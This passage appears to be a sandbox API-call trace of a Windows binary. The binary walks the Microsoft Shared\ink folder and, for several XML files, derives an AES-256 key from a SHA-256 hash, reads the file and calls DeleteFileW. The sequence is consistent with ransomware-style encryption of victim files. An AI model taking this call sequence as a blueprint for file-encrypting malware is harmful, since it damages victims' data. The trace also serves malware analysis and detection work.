lpFindFileData=0x326a648) returned 1 [0138.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0138.562] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0138.562] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0138.562] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.562] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.562] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.562] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x326b150, cbMultiByte=260, lpDefaultChar=0x326a92f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0138.562] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0138.562] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0138.562] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hwrcommonlm.dat", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrcommonlm.dat", lpUsedDefaultChar=0x0) returned 16 [0138.562] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.563] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0138.563] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 1 [0138.563] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0138.563] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0138.563] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hwrenalm.dat", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrenalm.dat", lpUsedDefaultChar=0x0) returned 13 [0138.563] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hwrenclm.dat", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrenclm.dat", lpUsedDefaultChar=0x0) returned 13 [0138.563] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hwrlatinlm.dat", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrlatinlm.dat", lpUsedDefaultChar=0x0) returned 15 [0138.563] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hwruklm.dat", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwruklm.dat", lpUsedDefaultChar=0x0) returned 12 [0138.563] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hwruksh.dat", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwruksh.dat", lpUsedDefaultChar=0x0) returned 12 [0138.564] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hwrusalm.dat", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrusalm.dat", lpUsedDefaultChar=0x0) returned 13 [0138.564] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="hwrusash.dat", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrusash.dat", lpUsedDefaultChar=0x0) returned 13 [0138.564] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InkDiv.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkDiv.dll", lpUsedDefaultChar=0x0) returned 11 [0138.564] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InkObj.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkObj.dll", lpUsedDefaultChar=0x0) returned 11 [0138.564] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InkWatson.exe", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InkWatson.exe", lpUsedDefaultChar=0x0) returned 14 [0138.564] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InputPersonalization.exe", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InputPersonalization.exe", lpUsedDefaultChar=0x0) returned 25 [0138.564] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipscat.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipscat.xml", lpUsedDefaultChar=0x0) returned 11 [0138.565] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.565] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.565] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.565] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.565] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa20 [0138.565] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.567] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.567] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.567] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.569] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml")) returned 0 [0138.569] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipschs.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipschs.xml", lpUsedDefaultChar=0x0) returned 11 [0138.575] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.575] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.575] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.575] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.575] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x99e [0138.575] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.577] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.577] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.577] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.578] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml")) returned 0 [0138.578] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipscht.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipscht.xml", lpUsedDefaultChar=0x0) returned 11 [0138.584] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.585] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.585] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.585] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.585] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x984 [0138.586] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.588] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.588] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.588] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.589] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml")) returned 0 [0138.589] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipscsy.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipscsy.xml", lpUsedDefaultChar=0x0) returned 11 [0138.590] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.591] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.591] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.591] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.591] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9fc [0138.591] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.633] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.633] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.633] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.634] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml")) returned 0 [0138.634] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsdan.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsdan.xml", lpUsedDefaultChar=0x0) returned 11 [0138.635] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.636] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.636] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.636] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.636] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9d2 [0138.636] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.638] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.638] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.638] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.639] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml")) returned 0 [0138.639] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsdeu.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsdeu.xml", lpUsedDefaultChar=0x0) returned 11 [0138.639] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.640] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.640] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.640] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.640] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa38 [0138.640] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.642] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.642] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.642] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.643] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml")) returned 0 [0138.643] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsen.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsen.xml", lpUsedDefaultChar=0x0) returned 10 [0138.644] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.645] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.645] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.645] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.645] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa12 [0138.645] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.647] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.647] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.647] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.649] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml")) returned 0 [0138.649] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsesp.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsesp.xml", lpUsedDefaultChar=0x0) returned 11 [0138.650] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.650] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.650] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.650] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.651] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbd0 [0138.651] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.653] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.653] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.653] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.654] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml")) returned 0 [0138.654] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPSEventLogMsg.dll", lpUsedDefaultChar=0x0) returned 19 [0138.654] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsfin.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsfin.xml", lpUsedDefaultChar=0x0) returned 11 [0138.655] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.655] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.655] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.655] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.656] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa62 [0138.656] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.660] CryptDestroyHash (hHash=0x284d568) returned 1 [0138.660] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.660] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.664] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml")) returned 0 [0138.664] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipsfra.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipsfra.xml", lpUsedDefaultChar=0x0) returned 11 [0138.665] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.666] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.666] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.666] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.666] GetFileSize (in: hFile=0x40c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa44 [0138.666] ReadFile (in: hFile=0x40c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0138.672] CryptDestroyHash (hHash=0x284d668) returned 1 [0138.672] CryptDestroyKey (hKey=0x284d628) returned 1 [0138.672] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0138.673] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml")) returned 0 [0138.673] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0138.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ipshrv.xml", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipshrv.xml", lpUsedDefaultChar=0x0) returned 11 [0138.757] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0138.758] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0138.758] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0138.758] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0138.758] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa5c [0138.758] ReadFile (in: hFile=0x410, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, 